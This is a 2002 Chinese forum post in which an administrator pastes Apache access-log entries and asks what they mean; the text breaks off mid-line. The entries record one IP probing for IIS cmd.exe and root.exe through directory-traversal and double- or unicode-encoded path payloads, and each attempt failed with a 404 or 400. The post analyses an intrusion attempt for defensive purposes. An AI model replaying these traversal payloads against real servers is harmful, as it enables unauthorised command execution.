由 yjmsir 在 06-13-2002 08:29 发表:
如何分析apache的access.log
今天我分析了一下机子上apache的access.log
发现有一段看不明白,请高手指点:
202.109.215.134 - - [12/Jun/2002:23:11:08 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:20 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:22 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:31 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:33 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:36 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:40 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:42 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:45 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:46 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:49 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:51 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 761
202.109.215.134 - - [12/Jun/2002:23:11:53 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 688
202.109.215.134 - - [12/Jun/2002:23:11:58 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 688
202.109.215.134 - - [12/Jun/2002:23:12:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/